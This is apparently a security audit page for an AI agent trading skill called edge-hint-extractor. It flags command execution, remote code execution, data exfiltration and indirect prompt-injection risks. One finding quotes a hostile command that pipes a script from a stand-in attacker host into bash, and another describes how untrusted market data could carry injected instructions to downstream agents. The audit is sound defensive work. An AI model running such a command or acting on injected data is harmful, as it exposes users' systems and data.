Skills
skills/tradermonty/claude-trading-skills/edge-hint-extractor/Gen Agent Trust Hub

edge-hint-extractor

Warn

Audited by Gen Agent Trust Hub on Apr 12, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The script scripts/build_hints.py uses subprocess.run to execute external commands specified by the --llm-ideas-cmd command-line argument. While it utilizes shlex.split for argument parsing, it still permits the execution of any binary available on the host system.
  • [REMOTE_CODE_EXECUTION]: The --llm-ideas-cmd parameter provides a mechanism for executing arbitrary code. If an agent is manipulated by a malicious prompt or compromised data to provide a command string such as curl http://attacker.com/script.sh | bash, the skill will execute it.
  • [DATA_EXFILTRATION]: Market observations and anomaly data are serialized into JSON and piped to the standard input of the process started via --llm-ideas-cmd. A malicious command could easily forward this data to an external server.
  • [PROMPT_INJECTION]: The skill represents a surface for indirect prompt injection because it ingests untrusted data from market summaries, anomalies, and news reactions which are then output into a structured hints.yaml file for downstream consumption.
  • Ingestion points: Reads market_summary.json, anomalies.json, and news_reactions.csv/json files in scripts/build_hints.py.
  • Boundary markers: The skill does not employ delimiters or specific instructions to downstream components to ignore potential instructions embedded within the hint data.
  • Capability inventory: The script includes subprocess.run capabilities to interface with external tools.
  • Sanitization: The script uses yaml.safe_load and json.loads for safe parsing of structured data, but it does not validate or sanitize the string content of the observations against potential prompt injection attacks.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Apr 12, 2026, 08:30 PM